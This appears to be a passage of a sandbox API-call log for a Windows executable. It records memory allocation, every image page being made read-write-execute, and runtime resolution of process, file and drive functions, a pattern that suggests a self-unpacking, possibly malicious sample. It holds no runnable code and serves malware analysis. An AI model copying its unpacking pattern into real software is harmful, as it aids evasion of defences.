1 [0229.642] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.663] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.666] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.685] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.688] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.708] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.710] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.730] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.733] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.751] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.754] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.774] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.777] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.797] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.800] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.820] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.823] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.842] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.845] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.863] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.866] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.886] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.888] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.907] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.909] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.928] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.931] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.949] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.951] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.969] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.973] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0229.990] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0229.993] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.012] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.015] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.032] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.035] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.054] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.057] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.073] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.076] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.093] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.096] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.115] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.118] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.148] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.151] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.168] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.171] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.188] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.191] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.209] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.211] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.231] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.234] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.251] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.254] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.272] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.274] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.292] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.295] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.313] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.315] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.336] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.339] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0230.358] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.364] GetSystemTime (in: lpSystemTime=0x209a920 | out: lpSystemTime=0x209a920*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0xa, wMinute=0x2e, wSecond=0x8, wMilliseconds=0x28e)) [0230.364] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.364] VirtualProtect (in: lpAddress=0x401000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.364] VirtualProtect (in: lpAddress=0x402000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.364] VirtualProtect (in: lpAddress=0x403000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.364] VirtualProtect (in: lpAddress=0x404000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.364] VirtualProtect (in: lpAddress=0x405000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.364] VirtualProtect (in: lpAddress=0x406000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.364] VirtualProtect (in: lpAddress=0x407000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x408000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x409000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x40a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x40c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x40d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x40e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x40f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x410000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x411000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x412000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x413000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x414000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x415000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x416000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x417000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x418000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x419000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x41a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x41b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x41c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.365] VirtualProtect (in: lpAddress=0x41d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x41e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x41f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x420000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x421000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x422000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x423000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x424000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x425000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x426000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x427000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x428000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x429000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x42a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x42b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x42c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x42d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x42e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x42f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x430000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x431000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x432000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x433000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.366] VirtualProtect (in: lpAddress=0x434000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x435000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x20) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x436000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x437000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x438000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x439000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x43a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x43b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x43c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x43d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x43e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x4) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x43f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x4) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x440000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x4) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x441000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x4) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x442000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x443000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x444000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x445000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x446000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x447000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.367] VirtualProtect (in: lpAddress=0x448000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x449000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x44a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x44b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x44c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x44d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x44e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x44f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x450000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x451000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x452000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x453000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x454000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x455000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x456000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x457000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.368] VirtualProtect (in: lpAddress=0x458000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x209a8f0 | out: lpflOldProtect=0x209a8f0*=0x2) returned 1 [0230.456] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76870000 [0230.456] GetProcAddress (hModule=0x76870000, lpProcName="GetFileAttributesA") returned 0x76896310 [0230.457] GetProcAddress (hModule=0x76870000, lpProcName="SetFileAttributesA") returned 0x76896500 [0230.457] GetProcAddress (hModule=0x76870000, lpProcName="lstrlenA") returned 0x76893a30 [0230.457] GetProcAddress (hModule=0x76870000, lpProcName="ReadFile") returned 0x768964a0 [0230.457] GetProcAddress (hModule=0x76870000, lpProcName="CopyFileA") returned 0x7688c510 [0230.457] GetProcAddress (hModule=0x76870000, lpProcName="DeleteFileA") returned 0x768961a0 [0230.457] GetProcAddress (hModule=0x76870000, lpProcName="Process32Next") returned 0x7688c8e0 [0230.458] GetProcAddress (hModule=0x76870000, lpProcName="FindFirstFileA") returned 0x76896210 [0230.458] GetProcAddress (hModule=0x76870000, lpProcName="FindNextFileA") returned 0x76896270 [0230.458] GetProcAddress (hModule=0x76870000, lpProcName="FindClose") returned 0x768961d0 [0230.458] GetProcAddress (hModule=0x76870000, lpProcName="SetEndOfFile") returned 0x768964f0 [0230.458] GetProcAddress (hModule=0x76870000, lpProcName="WriteConsoleW") returned 0x76896920 [0230.458] GetProcAddress (hModule=0x76870000, lpProcName="HeapSize") returned 0x76fe4f40 [0230.458] GetProcAddress (hModule=0x76870000, lpProcName="TerminateProcess") returned 0x7688fbc0 [0230.459] GetProcAddress (hModule=0x76870000, lpProcName="GetExitCodeProcess") returned 0x7688f6f0 [0230.459] GetProcAddress (hModule=0x76870000, lpProcName="OpenProcess") returned 0x768892b0 [0230.459] GetProcAddress (hModule=0x76870000, lpProcName="Process32First") returned 0x7688ed60 [0230.459] GetProcAddress (hModule=0x76870000, lpProcName="CreateToolhelp32Snapshot") returned 0x76897510 [0230.459] GetProcAddress (hModule=0x76870000, lpProcName="WriteFile") returned 0x76896590 [0230.459] GetProcAddress (hModule=0x76870000, lpProcName="CreateFileA") returned 0x76896170 [0230.460] GetProcAddress (hModule=0x76870000, lpProcName="lstrcatA") returned 0x7688efc0 [0230.460] GetProcAddress (hModule=0x76870000, lpProcName="GetEnvironmentVariableA") returned 0x7688a390 [0230.460] GetProcAddress (hModule=0x76870000, lpProcName="GetModuleFileNameA") returned 0x7688a040 [0230.460] GetProcAddress (hModule=0x76870000, lpProcName="GetDriveTypeA") returned 0x768962f0 [0230.460] GetProcAddress (hModule=0x76870000, lpProcName="GetLogicalDriveStringsA") returned 0x768ae9a0 [0230.460] GetProcAddress (hModule=0x76870000, lpProcName="CloseHandle") returned 0x76895f20 [0230.460] GetProcAddress (hModule=0x76870000, lpProcName="WaitForSingleObject") returned 0x76896110 [0230.461] GetProcAddress (hModule=0x76870000, lpProcName="CreateProcessA") returned 0x768b0960 [0230.461] GetProcAddress (hModule=0x76870000, lpProcName="GetStdHandle") returned 0x7688a060 [0230.461] GetProcAddress (hModule=0x76870000, lpProcName="MoveFileA") returned 0x7688c240 [0230.461] GetProcAddress (hModule=0x76870000, lpProcName="GetConsoleWindow") returned 0x768d6940 [0230.461] GetProcAddress (hModule=0x76870000, lpProcName="WideCharToMultiByte") returned 0x768875a0 [0230.461] GetProcAddress (hModule=0x76870000, lpProcName="DuplicateHandle") returned 0x76895f30 [0230.461] GetProcAddress (hModule=0x76870000, lpProcName="WaitForSingleObjectEx") returned 0x76896120 [0230.462] GetProcAddress (hModule=0x76870000, lpProcName="Sleep") returned 0x768877b0 [0230.462] GetProcAddress (hModule=0x76870000, lpProcName="GetCurrentProcess") returned 0x76882da0 [0230.462] GetProcAddress (hModule=0x76870000, lpProcName="GetCurrentThread") returned 0x768875c0 [0230.462] GetProcAddress (hModule=0x76870000, lpProcName="GetCurrentThreadId") returned 0x76881b90 [0230.462] GetProcAddress (hModule=0x76870000, lpProcName="GetExitCodeThread") returned 0x7688eed0 [0230.462] GetProcAddress (hModule=0x76870000, lpProcName="EnterCriticalSection") returned 0x76fd5e80 [0230.463] GetProcAddress (hModule=0x76870000, lpProcName="LeaveCriticalSection") returned 0x76fd5e00 [0230.463] GetProcAddress (hModule=0x76870000, lpProcName="TryEnterCriticalSection") returned 0x76fe9070 [0230.463] GetProcAddress (hModule=0x76870000, lpProcName="DeleteCriticalSection") returned 0x76fe9920 [0230.463] GetProcAddress (hModule=0x76870000, lpProcName="GetLastError") returned 0x76882db0 [0230.463] GetProcAddress (hModule=0x76870000, lpProcName="EncodePointer") returned 0x76fef190 [0230.463] GetProcAddress (hModule=0x76870000, lpProcName="DecodePointer") returned 0x76fea200 [0230.464] GetProcAddress (hModule=0x76870000, lpProcName="MultiByteToWideChar") returned 0x76882d60 [0230.464] GetProcAddress (hModule=0x76870000, lpProcName="QueryPerformanceCounter") returned 0x76882dc0 [0230.464] GetProcAddress (hModule=0x76870000, lpProcName="SetLastError") returned 0x76882af0 [0230.464] GetProcAddress (hModule=0x76870000, 